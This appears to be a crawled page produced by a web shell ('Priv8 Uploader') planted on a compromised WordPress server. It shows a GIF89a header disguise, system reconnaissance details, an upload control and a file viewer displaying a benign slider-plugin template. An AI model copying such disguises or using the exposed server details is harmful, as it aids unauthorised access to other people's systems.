GIF89a;
Notice: Undefined index: in /home/bs3263/domains/poolq.ee/public_html/wp-content/plugins/classic-editor/classic-editor.php on line 3

Priv8 Uploader By InMyMine7

Linux bs3.beeserver.ee 2.6.32-642.6.2.el6.x86_64 #1 SMP Wed Oct 26 06:52:09 UTC 2016 x86_64
HEX
HEX
Server: Apache/2
System: Linux bs3.beeserver.ee 2.6.32-642.6.2.el6.x86_64 #1 SMP Wed Oct 26 06:52:09 UTC 2016 x86_64
User: bs3263 (524)
PHP: 7.3.5
Disabled: NONE
Upload Files
File: /home/bs3263/public_html/wp-content/plugins/slider-image/templates/admin/add-slider-popup.php
<?php
/**
 * @var stdClass $sliders
 */
?>
<div id="hugeit_slider_media_popup" class="post-slider" style="display: none">
    <div class="post-slider">
        <div class="post-slider-block">
            <div class="slider-body">
                <div class="select-slider">
                    <h3><?php _e('Select the Slider', 'hugeit-slider'); ?></h3>
                    <div class="select-block">
                        <select>
							<?php if (!empty($sliders)) : ?>
                                <?php foreach ( $sliders as $id => $slider ): ?>
                                    <option value="<?php echo $id; ?>"><?php echo $slider->name; ?></option>
							    <?php endforeach; ?>
                            <?php else : ?>
                                <option value=""><?php _e('You have no created slider', 'hugeit-slider'); ?></option>
							<?php endif; ?>
                        </select>
                        <button <?php disabled(empty($sliders)) ?> id="hugeit_slider_insert_slider_to_post"><?php _e('Insert Slider', 'hugeit-slider'); ?></button>
                    </div>
                </div>
            </div>
        </div>
    </div>
</div>